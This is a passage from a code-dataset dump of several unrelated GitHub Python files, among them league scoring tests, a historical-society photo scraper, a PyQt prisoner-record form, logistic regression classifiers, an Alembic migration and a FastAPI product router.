False\n \n match3 = Match(None,\"team6\",0,\"team3\",3)\n match3.homeTeamIsPlayerTeam = False\n match3.awayTeamIsPlayerTeam = True\n\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n germany = Team(\"germany\",\"player3\")\n team3 = Team(\"team3\",\"player4\")\n brazil = Team(\"brazil\",\"player5\")\n team6 = Team(\"team6\",\"player6\")\n \n myLeague.matches.extend([match1,match2,match3])\n myLeague.teams.extend([team1,germany,team3,team2,brazil,team6])\n \n myLeague.calculatePointsForMatches()\n assert match1.bonusPoints == -10 #\n assert match2.bonusPoints == -10\n assert match3.bonusPoints == 0\n\n\n\ndef test_applyMatchMultipliers_applies_no_multipliers_if_only_1_teams_is_a_player_team():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",None)\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = False\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 20\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_both_teams_of_same_player():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player1\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 0\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_both_teams_of_different_player():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_draw_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.draw = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 5\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 10\n \ndef test_applyMatchMultipliers_applies_correct_multiplier_for_away_win_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = False\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n 
myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_home_win_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 20 \n \ndef test_applyMatchMultipliers_applies_correct_multiplier_for_home_win_for_superliga_grundspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,3,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40 \n \ndef test_applyMatchMultipliers_applies_correct_multiplier_with_changed_INDBYRDES_MULTIPLIER_constant():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 30\n \n const.INDBYRDES_MULTIPLIER = 3\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 90\n\ndef test_findTeamByTeamName_finds_team_if_it_is_there():\n mockLeague = getMockLeagueForFindTeamTests()\n newTeam = Team(\"newName\",\"newPlayer\")\n mockLeague.teams.append(newTeam)\n assert util.findTeamByTeamName(mockLeague.teams,newTeam.name) == newTeam\n \ndef test_findTeamByTeamName_raises_exception_if_team_is_not_there():\n mockLeague = getMockLeagueForFindTeamTests()\n newTeamNotThere = Team(\"raise\",\"exception\")\n with pytest.raises(Exception):\n util.findTeamByTeamName(mockLeague.teams,newTeamNotThere.name) == newTeamNotThere\n","repo_name":"Lildhansen/FerieKasse","sub_path":"Testing/league_test.py","file_name":"league_test.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39682947347","text":"import requests\r\nfrom lxml import etree\r\nimport json\r\nimport pdb\r\nimport re\r\nfrom base import *\r\n\r\n\r\nclass Search_mnhs_org:\r\n name = 'search_mnhs_org'\r\n base_url = 'https://search.mnhs.org'\r\n\r\n def __init__(self):\r\n self.db, self.cursor = connect_mysql_db()\r\n self.session = requests.Session()\r\n self.headers = {\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n 'Cookie': '_ga=GA1.2.2127827836.1615311398; _gid=GA1.2.1680323628.1615422977; _gat=1',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'User-Agent': 
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36',\r\n }\r\n self.start_requests()\r\n \r\n def start_requests(self):\r\n try:\r\n page_num = 1\r\n while True:\r\n url = f'https://search.mnhs.org/index.php?collection[]=mn_mhs-cms&subject[]=Residences&count=100&startindex={page_num}'\r\n response = self.session.get(url, headers=self.headers)\r\n tree = etree.HTML(response.text)\r\n collections = tree.xpath('//div[@id=\"main-content\"]//span[@class=\"list_right\"]//strong[@class=\"item-title\"]//a')\r\n if collections == []:\r\n break \r\n for collection in collections:\r\n c_url = validate(collection.xpath('./@href'))\r\n self.parse_collection(c_url)\r\n page_num += 100\r\n except Exception as e:\r\n print(e)\r\n \r\n def parse_collection(self, c_url):\r\n try:\r\n c_response = self.session.get(c_url, headers=self.headers)\r\n c_tree = etree.HTML(c_response.text)\r\n data = {}\r\n fields = c_tree.xpath('.//table[@id=\"itemTable\"]//tr')\r\n for field in fields:\r\n key = validate(field.xpath('.//th//text()')).lower()\r\n value = validate(field.xpath('.//td//text()'))\r\n if key == 'description':\r\n data['caption'] = value\r\n if key == 'subjects':\r\n data['subject'] = value\r\n if key == 'dates':\r\n years = re.findall('(\\d{4})', value)\r\n if len(years) > 0:\r\n data['year_built'] = years[0]\r\n if key == 'creation':\r\n data['photo_publisher'] = eliminate_space(value.split(':'))[-1]\r\n if key == 'places':\r\n values = field.xpath('.//td//text()')\r\n try:\r\n addrs = values[0].split(':')[-1].split(', ')\r\n if len(addrs) == 5:\r\n addr, data['city'], data['county'], data['state'], country = addrs\r\n if 'neighborhood' in addr.lower():\r\n data['neighborhood'] = addr\r\n else:\r\n data['street_address'] = addr\r\n else:\r\n try:\r\n data['city'], data['county'], data['state'], country = addrs\r\n except:\r\n pass\r\n except:\r\n pass\r\n\r\n data['source'] = 'Search the Minnesota Historical Society'\r\n data['source_url'] = c_url\r\n c_id = c_url.split('?irn=')[1].split('&')[0]\r\n data['uuid'] = generate_uuid(f\"mnhs_{c_id}\")\r\n thumbnail_url = validate(c_tree.xpath('.//div[@class=\"item-group\"]//img/@src'))\r\n if thumbnail_url != '':\r\n data['thumbnail_url'] = f'http://collections.mnhs.org/cms/{thumbnail_url}'\r\n data['photo_url'] = data['thumbnail_url'].replace('&kind=thumbnail', '')\r\n data['photo_location'] = f\"photos/{self.name}/{c_id}.jpg\"\r\n download_photo(self.session, data['photo_url'], {}, f\"photos/{self.name}\", data['photo_location'])\r\n insert_data_into_mysql_db(self.db, self.cursor, data)\r\n except Exception as e:\r\n print(e)\r\n\r\nif __name__ == '__main__':\r\n Search_mnhs_org()\r\n","repo_name":"coralisland-git/house-novel-scraper","sub_path":"search_mnhs_org.py","file_name":"search_mnhs_org.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14794306077","text":"class loop_tracker:\n BLANK = object()\n\n def __init__(self, iterable):\n self.iterable = iter(iterable)\n self.empty_accesses = self.size = 0\n self._cache = self._first = self._last = self.BLANK\n\n def __iter__(self):\n return self\n\n def __len__(self):\n return self.size\n\n def __next__(self):\n item = self._access()\n if item is self.BLANK:\n self.empty_accesses += 1\n raise StopIteration\n self.size += 1\n self._last = item\n self._cache = self.BLANK\n return item\n\n def _access(self):\n if self._cache is 
self.BLANK:\n if self._first is self.BLANK:\n self._cache = self._first = next(self.iterable, self.BLANK)\n else:\n self._cache = next(self.iterable, self.BLANK)\n return self._cache\n\n def is_empty(self):\n if self._access() is self.BLANK:\n return True\n return False\n\n @property\n def last(self):\n if self._last is self.BLANK:\n raise AttributeError(f'{self.__name__} iterator has not been accessed so it has no last attribute')\n return self._last\n\n @property\n def first(self):\n self._access()\n if self._first is self.BLANK:\n raise AttributeError(f'{self.__name__} iterable does not have a first attribute') from None\n return self._first\n","repo_name":"ryanh153/Morsels","sub_path":"53_78/62_loop_tracker/loop_tracker.py","file_name":"loop_tracker.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33971612071","text":"from copy import deepcopy\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sn\r\nfrom sklearn import preprocessing\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\n# Build the One vs All matrix using the infrastructures that created.\r\ndef build_oneVSall_matrix(LR_Models, x_test, y_test):\r\n probability_of_Xi = np.zeros(len(LR_Models))\r\n confusion_matrix = np.zeros((len(LR_Models), len(LR_Models)))\r\n for j in range(0, x_test.shape[0]):\r\n for i in range(0, len(LR_Models)):\r\n probability_of_Xi[i] = (LR_Models[i].predict_proba([x_test[j]]))[0][1]\r\n best_prob_index = np.argmax(probability_of_Xi)\r\n confusion_matrix[y_test[j] - 1][best_prob_index] += 1\r\n sn.heatmap(confusion_matrix, annot=True, xticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'),\r\n yticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'))\r\n accuracy = 0\r\n for i in range(6):\r\n accuracy += confusion_matrix[i][i]\r\n accuracy = accuracy / len(x_test)\r\n print('One vs All Accuracy: ', accuracy)\r\n plt.xlabel('Predict')\r\n plt.ylabel('Actual')\r\n plt.title('One vs All')\r\n plt.show()\r\n\r\n\r\n# Setup the infrastructures for the One vs All LR method\r\ndef setupLRsOneVsAll(x_train, y_train):\r\n logistic_regression_for_car = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_fad = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_mas = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_gla = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_con = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_adi = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n\r\n car_y_train = replaceClassName(1, y_train).astype('int')\r\n fad_y_train = replaceClassName(2, y_train).astype('int')\r\n mas_y_train = replaceClassName(3, y_train).astype('int')\r\n gla_y_train = replaceClassName(4, y_train).astype('int')\r\n con_y_train = replaceClassName(5, y_train).astype('int')\r\n adi_y_train = replaceClassName(6, y_train).astype('int')\r\n\r\n logistic_regression_for_car.fit(x_train, car_y_train)\r\n logistic_regression_for_fad.fit(x_train, fad_y_train)\r\n logistic_regression_for_mas.fit(x_train, mas_y_train)\r\n logistic_regression_for_gla.fit(x_train, gla_y_train)\r\n logistic_regression_for_con.fit(x_train, con_y_train)\r\n logistic_regression_for_adi.fit(x_train, adi_y_train)\r\n\r\n 
return [logistic_regression_for_car, logistic_regression_for_fad, logistic_regression_for_mas,\r\n logistic_regression_for_gla, logistic_regression_for_con, logistic_regression_for_adi]\r\n\r\n\r\n# Isolate specific class by define it as '1' and others to '0'\r\ndef replaceClassName(oneOption, Ys_train):\r\n copy = Ys_train.copy()\r\n copy[copy != oneOption] = 0\r\n copy[copy == oneOption] = 1\r\n return copy\r\n\r\n\r\n# Convert all Y vector's values to numbers\r\ndef setupY(y):\r\n y[y == 'car'] = 1\r\n y[y == 'fad'] = 2\r\n y[y == 'mas'] = 3\r\n y[y == 'gla'] = 4\r\n y[y == 'con'] = 5\r\n y[y == 'adi'] = 6\r\n return y\r\n\r\n\r\n# Filter 2 classes from array of classes\r\ndef filterClasses(x_train, y_train, class1, class2):\r\n class1Indexes = np.asarray(np.where(y_train == class1))\r\n class2Indexes = np.asarray(np.where(y_train == class2))\r\n mergeIndexes = np.sort(np.concatenate((class1Indexes[0], class2Indexes[0])))\r\n return [x_train[mergeIndexes, :], replaceClassName(class1, y_train[mergeIndexes])]\r\n\r\n\r\n# Setup the infrastructures for the One vs One LR method\r\ndef setupLRsOneVsOne(x_train, y_train, numOfClasses):\r\n oneVSoneLRsArray = np.zeros((numOfClasses, numOfClasses), dtype=object)\r\n for j in range(numOfClasses):\r\n for i in range(j + 1, numOfClasses):\r\n x_train_ij, y_train_ij = filterClasses(deepcopy(x_train), y_train.copy(), j + 1, i + 1)\r\n oneVSoneLRsArray[j][i] = LogisticRegression(max_iter=1000, class_weight='balanced').fit(x_train_ij,\r\n list(y_train_ij))\r\n return oneVSoneLRsArray\r\n\r\n\r\n# Execute the One vs One LRs algorithm\r\ndef calculate_oneVSoneLR(oneVSoneLRsArray, numOfClasses, x_test, y_test):\r\n oneVSone_confusion_matrix = np.zeros((numOfClasses, numOfClasses))\r\n LR_results = np.zeros(numOfClasses)\r\n for k in range(len(y_test)):\r\n for j in range(numOfClasses):\r\n for i in range(numOfClasses):\r\n if i > j:\r\n LR_results[j] += (oneVSoneLRsArray[j][i].predict_proba([x_test[k]]))[0][1]\r\n elif i < j:\r\n LR_results[j] += (oneVSoneLRsArray[i][j].predict_proba([x_test[k]]))[0][0]\r\n oneVSone_confusion_matrix[y_test[k] - 1][np.argmax(LR_results)] += 1\r\n LR_results = np.zeros(numOfClasses)\r\n\r\n sn.heatmap(oneVSone_confusion_matrix, annot=True, xticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'),\r\n yticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'))\r\n accuracy = 0\r\n for i in range(6):\r\n accuracy += oneVSone_confusion_matrix[i][i]\r\n accuracy = accuracy / len(x_test)\r\n print('One vs One Accuracy: ', accuracy)\r\n plt.xlabel('Predict')\r\n plt.ylabel('Actual')\r\n plt.title('One vs One')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n excelData = pd.read_excel('breastTissue for one and all.xlsx', sheet_name='Data')\r\n df = pd.DataFrame(excelData,\r\n columns=['Case #', 'Class', 'I0', 'PA500', 'HFS', 'DA', 'Area', 'A/DA', 'Max IP', 'DR', 'P'])\r\n x = df[['I0', 'PA500', 'HFS', 'DA', 'Area', 'A/DA', 'Max IP', 'DR', 'P']]\r\n y = df['Class']\r\n y = y.to_numpy()\r\n numericY = setupY(y.copy())\r\n x = preprocessing.scale(x)\r\n x_train, x_test, y_train, y_test = train_test_split(x, numericY, test_size=0.33, random_state=42)\r\n LR_Models = setupLRsOneVsAll(x_train, y_train)\r\n build_oneVSall_matrix(LR_Models, x_test, y_test)\r\n\r\n oneVSoneLRsArray = setupLRsOneVsOne(x_train, y_train, 6)\r\n calculate_oneVSoneLR(oneVSoneLRsArray, 6, x_test, y_test)\r\n","repo_name":"adielts/My-repo","sub_path":"Deep 
learning/LR_oneVSone_oneVSall.py","file_name":"LR_oneVSone_oneVSall.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10835322790","text":"\"\"\"empty message\n\nRevision ID: 0bc364df16ea\nRevises: 4b8e4473789a\nCreate Date: 2022-04-24 19:24:31.929077\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0bc364df16ea'\ndown_revision = '4b8e4473789a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('instructor', 'section_id')\n op.add_column('section', sa.Column('assignedInstructor', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'section', 'instructor', ['assignedInstructor'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'section', type_='foreignkey')\n op.drop_column('section', 'assignedInstructor')\n op.add_column('instructor', sa.Column('section_id', sa.INTEGER(), nullable=True))\n # ### end Alembic commands ###\n","repo_name":"MitchelCarreon/cpscadtaa","sub_path":"migrations/versions/0bc364df16ea_.py","file_name":"0bc364df16ea_.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33501192849","text":"class Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n if rowIndex == 0:\n return [1]\n elif rowIndex == 1:\n return [1, 1]\n else:\n prevRow = self.getRow(rowIndex - 1)\n temp = []\n for i in range(len(prevRow) - 1):\n temp.append(prevRow[i] + prevRow[i+1])\n return [1] + temp + [1]\n\n\n \n\n\n ","repo_name":"dagiTensay/competitve-programming","sub_path":"0119-pascals-triangle-ii/0119-pascals-triangle-ii.py","file_name":"0119-pascals-triangle-ii.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23217462726","text":"import sqlite3\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom menu import Ui_Menu\nfrom sqlite3 import Error\nfrom table import Ui_Dialog\nimport sys\nfrom AddRecord_UI import Ui_Dialog\nimport datetime\nfrom Alert import Alert\nimport PyQt5\n\nif hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):\n PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)\n \nif hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):\n PyQt5.QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\nclass AddRecords:\n def __init__(self,rights,data):\n self.conn = sqlite3.connect('se_db.db')\n self.rights = rights\n self.data = data\n \n self.rr = []\n self.diag = QtWidgets.QDialog()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self.diag)\n self.ui.pushButton.clicked.connect(self.AddRecord)\n self.ui.comboBox.addItems([\"1\", \"2\", \"3\"])\n self.ui.comboBox_2.addItems([\"1\", \"2\", \"3\",\"4\",\"5\",\"6\",\"7\",\"8\"])\n self.ui.comboBox_3.addItems([\"Fit\",\"Unfit\",\"Critical\"])\n self.ui.comboBox_4.addItems([\"Murder\",\"Roberry\",\"Extortion\",\"Blasphemy\",\"Corruption\",\"Theft\",\"Cyber Crimes\",\"Human Trafficking\",\"Attempt to Commit Suicide\"])\n self.ui.comboBox_5.addItems([\"None\",\"Laundry\",\"Cleaning\",\"Kitchen\"])\n\n if self.rights == 1:\n self.editRecord()\n\n self.diag.exec_()\n \n def 
AddRecord(self):\n \n\n if self.ui.textEdit.toPlainText().isalpha():\n name = self.ui.textEdit.toPlainText()\n print(\"name = letters only\")\n else:\n self.ui.textEdit.setFocus()\n name = \"wrongvalue\"\n section_ID = self.ui.comboBox.currentText()\n cell_ID = self.ui.comboBox_2.currentText() #Filhal Hardcoded\n try:\n sentence = int(self.ui.textEdit_3.toPlainText())\n except ValueError:\n self.ui.textEdit_3.setFocus()\n sentence = \"wrongvalue\"\n print(\"Characters included\")\n \n if self.rights == 1: #edit mode\n mydata = self.data[0]\n arrival_Date = mydata[4] #use old arrival date\n\n #yahan release date change krni hai according to sentence (which has been modified)\n release_Date = mydata[5] #remomve this \n\n else: #new recird hai\n\n x = datetime.datetime.now()\n arrival_Date = str(x.day)+\"-\"+str(x.month)+\"-\"+str(x.year)\n \n if sentence != \"wrongvalue\": #warna string ko int mein add kr rha tha\n release_Date = str(x.day)+\"-\"+str(x.month)+\"-\"+str(x.year+sentence)\n \n Crime = self.ui.comboBox_4.currentText()\n crime_description = self.ui.textEdit_5.toPlainText()\n Medical_Status = self.ui.comboBox_3.currentText()\n if self.ui.textEdit_6.toPlainText().isalpha():\n Emergency_contact_name = self.ui.textEdit_6.toPlainText()\n print(\"name = letters only\")\n else:\n self.ui.textEdit_6.setFocus()\n Emergency_contact_name = \"wrongvalue\"\n duty_assigned = self.ui.comboBox_5.currentText()\n\n try:\n age = int(self.ui.textEdit_4.toPlainText())\n except ValueError:\n self.ui.textEdit_4.setFocus()\n age = \"wrongvalue\"\n print(\"Characters included\")\n try:\n Emergency_contact_number = int(self.ui.textEdit_7.toPlainText())\n except ValueError:\n self.ui.textEdit_7.setFocus()\n Emergency_contact_number = \"wrongvalue\"\n print(\"Characters included\")\n\n if name != \"wrongvalue\" and age != \"wrongvalue\" and sentence != \"wrongvalue\" and Emergency_contact_name != \"wrongvalue\" and Emergency_contact_number != \"wrongvalue\":\n newrr = []\n #rr.append(5)\n self.rr.append(name)\n self.rr.append(section_ID)\n self.rr.append(cell_ID)\n self.rr.append(arrival_Date)\n self.rr.append(release_Date)\n self.rr.append(Crime)\n self.rr.append(crime_description)\n self.rr.append(sentence)\n self.rr.append(Medical_Status)\n self.rr.append(Emergency_contact_name)\n self.rr.append(duty_assigned)\n \n self.rr.append(age)\n \n self.rr.append(Emergency_contact_number)\n \n cur = self.conn.cursor()\n \n if(self.rights==0):\n \n cur.execute(\"Insert into Prisoner(prisoner_name,section_id,cell_id,arrival_date,release_date,crime,crime_description,sentence,medical_status,emergency_name,work_assigned,Emergency_contact,Age) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)\",self.rr)\n \n \n \n else:\n #EditRecord\n \n \n iterator = 0\n \n #newrr.append(self.rr[0]) #ID at end\n \n for i in self.rr:\n if(iterator==0):\n None\n else:\n newrr.append(i)\n iterator = iterator + 1\n \n newrr.append(self.rr[0]) #ID at end\n \n cur.execute(\"Update Prisoner SET prisoner_name=?, section_id=?,cell_id=?,arrival_date=?,release_date=?,crime=?,crime_description=?,sentence=?,medical_status=?,emergency_name=?,work_assigned=?,Emergency_contact=?,Age=? 
WHERE prisoner_id=?\",newrr)\n self.conn.commit()\n self.rr.clear()\n newrr.clear()\n \n self.ui.textEdit.clear()\n self.ui.textEdit_3.clear()\n self.ui.textEdit_4.clear()\n self.ui.textEdit_5.clear()\n self.ui.textEdit_6.clear()\n self.ui.textEdit_7.clear()\n\n else:\n \"\"\" show alert box here \"\"\"\n msg = Alert(\"Invalid input(s)\")\n\n\n \n\n\n def editRecord(self):\n \n print(\"hi\")\n '''\n name -> textEdit\n age -> textEdit_4\n crime description -> textEdit5\n sentence -> textEdit3\n Emergency contact Name-> textEdit6\n Emergency contact Number-> textEdit7\n\n\n for record in data:\n itr = 0\n for eachrecord in data:\n if(itr==0 or itr==2 or itr==3 or itr==5 or itr==6 or itr==1):\n print(\"I am here\")\n else:\n self.ui.textEdit_4.setText(\"Amir\")\n\n\n \n '''\n\n # int index = ui->comboBox->findText(textToFind)\n # ui->comboBox->setCurrentIndex(index);\n\n mydata = self.data[0]\n print(\"Data Received\",self.data)\n ID = mydata[0]\n Name = mydata[1]\n section = mydata[2]\n cell = mydata[3]\n A_date = mydata[4]\n R_date = mydata[5]\n crime = mydata[6]\n crime_desp = mydata[7]\n sentence = mydata[8]\n\n medical = mydata[9]\n emg_Name = mydata[10]\n emg_Contact = mydata[12]\n work_Assigned = mydata[11]\n Age = mydata[13]\n\n self.rr.append(ID)\n\n\n\n\n\n\n print(self.data)\n self.ui.textEdit_4.setText(str(Age))\n self.ui.textEdit.setText(str(Name))\n self.ui.textEdit_5.setText(str(crime_desp))\n self.ui.textEdit_3.setText(str(sentence))\n self.ui.textEdit_6.setText(str(emg_Name))\n self.ui.textEdit_7.setText(str(emg_Contact))\n\n index = 0\n\n index = self.ui.comboBox.findText(str(section))\n self.ui.comboBox.setCurrentIndex(index)\n \n index = self.ui.comboBox_2.findText(str(cell))\n self.ui.comboBox_2.setCurrentIndex(index)\n\n index = self.ui.comboBox_3.findText(str(medical))\n self.ui.comboBox_3.setCurrentIndex(index)\n\n index = self.ui.comboBox_4.findText(str(crime))\n self.ui.comboBox_4.setCurrentIndex(index)\n\n index = self.ui.comboBox_5.findText(str(work_Assigned))\n self.ui.comboBox_5.setCurrentIndex(index)\n\n\n \n\n \n\n\n ","repo_name":"AmirQadir/PrisonManagementSystem","sub_path":"AddRecords.py","file_name":"AddRecords.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33704648401","text":"import json\r\n\r\nclass channel:\r\n\r\n number = ''\r\n name =''\r\n picture = ''\r\n\r\nclass channels(object):\r\n\r\n def __init__(self, data):\r\n self.jData = data\r\n\r\n def getChannel(self, channelNo):\r\n\r\n ch = channel\r\n ch.name = 'Channel %s' % str(channelNo)\r\n\r\n for item in self.jData['channellist']:\r\n if item['contentId'] == str(channelNo):\r\n ch.name = item['name']\r\n ch.number = item ['chanNo']\r\n\r\n # just take first picture\r\n pics = item ['pictures']\r\n for p in pics:\r\n ch.picture = p['href']\r\n break\r\n\r\n return ch\r\n\r\n\r\n\r\n","repo_name":"mking2203/plugin.video.myMagenta","sub_path":"resources/lib/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11861576711","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: krakowiakpawel9@gmail.com\n@site: e-smartdata.org\n\"\"\"\n\nimport pandas as pd\n\n\n# %% import data form csv file, comma separated file\ndf = pd.read_csv('./data/cdr_d.csv', index_col=0)\n\n# select only close price\nclose_price = df['Zamkniecie']\n\n# export oto 
csv\nclose_price.to_csv('./data/close_price.csv', header=['close'])\n\n# export to json\nclose_price.to_json('./data/close_price.json')\n\n# export to latex\nclose_price.to_latex('./data/close_price.tex')\n\n# export to python list\nclose_price_dict = close_price.to_dict()\n\n# %% import data from clipboard\nclipboard_df = pd.read_clipboard()\n\n# export to csv file\nclipboard_df.to_csv('./data/clipboard.csv', encoding='utf-8')\n\n# export to json file\nclipboard_df.to_json('./data/clipboard.json')\n","repo_name":"krakowiakpawel9/pandas_course","sub_path":"01_data_structure/01_series/05_import_export_data.py","file_name":"05_import_export_data.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"5613295824","text":"from fastapi import APIRouter\nfrom core.schemas import product\n\nProduct = product.Product\nrouter = APIRouter()\n\ndata = [\n {\n \"name\": \"Samsung 103in Curved TV\",\n \"description\": \"Its supa curvy and thiccc\",\n \"price\": 999.99,\n \"id\": \"2342342332\"\n },\n {\n \"name\": \"Samsung 99in TV\",\n \"description\": \"Its supa thiccc\",\n \"price\": 700,\n \"id\": \"12312\"\n },\n {\n \"name\": \"Sony 27in Monitor\",\n \"description\": \"Really good crispy monitor\",\n \"price\": 100.22,\n \"id\": \"123sdf\"\n }\n]\n\n@router.get(\"/\")\nasync def 